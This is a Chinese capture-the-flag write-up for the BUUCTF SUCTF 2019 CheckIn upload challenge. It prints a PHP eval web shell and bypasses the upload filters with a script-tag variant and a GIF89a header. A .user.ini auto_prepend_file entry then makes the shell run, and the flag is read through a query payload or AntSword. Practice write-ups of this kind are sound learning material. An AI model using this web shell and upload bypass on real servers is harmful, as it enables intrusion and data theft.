BUUCTF [SUCTF 2019]CheckIn 1(user.ini文件构成的PHP后门 | 两种解法!)

题目环境:

可以看出是文件上传类的题目

绕过后缀的文件格式有php、php3、php4、php5、phtml、pht。

构造木马文件
<?php @eval($_REQUEST['shell']); ?>

这里我把文件命名为了shell.php

上传木马文件

illegal suffix!

非法后缀
将shell.php改为shell.jpg

继续上传木马文件

<? in contents! 存在违法内容"<?"
改变思路点

将PHP一句话木马转换为JS形式

重构木马文件
<script language="php">@eval($_REQUEST['shell']);</script>

继续上传

exif_imagetype:not image!

Exif _ imagetype: 不是 image!
Exif _ imagetype无法检测GIF动态图片

GIF的ASCII值是GIF89a

木马前面加GIF89a来绕过Exif _ imagetype的检测

重构
GIF89a<script language="php">@eval($_REQUEST['shell']);</script>

上传

上传成功

使用中国蚁剑测试连接

可以连接,但是返回数据是空的

猜测后台并没有解析PHP代码

访问题目源码

提示是.user.ini配置文件
这里呢,我发现.user.ini配置文件与.htaccess配置文件比较类似

概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

注意这几个字"改变文件扩展名"。

.htaccess配置文件格式

<FileMatch "1.jpg>

SetHandler application/x-httpd-php

那么我这里就觉得或者说是简单理解吧

.user.ini配置文件和.htaccess配置文件都是为了解析PHP代码
php.ini大家都熟悉,那么我们就可以把.user.ini理解为用户可自定义的php.ini配置文件
官方给的解释

两个比较有意思的东西

而这两个就是.user.ini中的两个配置项

auto_prepend_file是在文件前插入

auto_append_file是在文件最后才插入

创建.user.ini文件

GIF89a

auto_prepend_file=shell.jpg

上传.user.ini文件

访问路径文件
[http://ac513c0d-afdf-4e89-920a-93eedd63102d.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php](http://ac513c0d-afdf-4e89-920a-93eedd63102d.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php)

回显GIF89a就代表解析成功了

这里解释一下为什么index.php主文件在最后面

因为我们使用的是auto_prepend_file,在主文件之前就已经自动解析文件名了,所以index.php主文件在最后面。

第一种解法:PHP内部命令

var_dump() 函数用于输出变量的相关信息。

file_get_contents() 函数把整个文件读入一个字符串中。

构造payload
[http://19ff03ff-93cb-4b33-94ec-95a79619b92a.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php](http://19ff03ff-93cb-4b33-94ec-95a79619b92a.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php)?shell=var_dump(file_get_contents("/flag"));

上传payload

得到flag
flag{4f105e98-c110-4b71-9160-545aa8e7131e}
第二种解法:中国蚁剑
http://2d9647e6-425e-4d7f-bb6a-116f0f51bfc8.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php

注:中国蚁剑连接密码就是PHP一句话木马里面的参数

我这里是shell


得到flag:
flag{8f943f63-53c9-4395-9f91-d28052e52d55}

这两种方法测试完,我发现,上传木马后有时间限制,过一段时间木马就会失效,还有试过一种方法,再试另一种方法木马也会失效;只需要重新开启题目环境即可,最后,做这道题的步骤是,先上传.user.ini配置文件,再去上传PHP一句话木马文件。

相关推荐
sone121384 分钟前
计算机网络(第8版)第四章 网络层(4.7.1~4.7.3)
服务器·网络·计算机网络
DO_Community16 分钟前
DigitalOcean Droplet 云服务器:新增自动扩展池功能
服务器
安科瑞刘鸿鹏21 分钟前
老旧小区用电安全保护装置#限流式防火保护器参数介绍#
运维·服务器·物联网·能源
好开心3322 分钟前
axios的使用
开发语言·前端·javascript·前端框架·html
ladymorgana29 分钟前
【运维笔记】windows 11 中提示:无法成功完成操作,因为文件包含病毒或潜在的垃圾软件。
运维·windows·笔记
mmsx31 分钟前
android 登录界面编写
android·登录界面
姜毛毛-JYM31 分钟前
【JetPack】Navigation知识点总结
android
Rain_Rong40 分钟前
linux检测硬盘
linux·运维·服务器
又蓝1 小时前
使用 Python 操作 Excel 表格
开发语言·python·excel
余~~185381628001 小时前
稳定的碰一碰发视频、碰一碰矩阵源码技术开发,支持OEM
开发语言·人工智能·python·音视频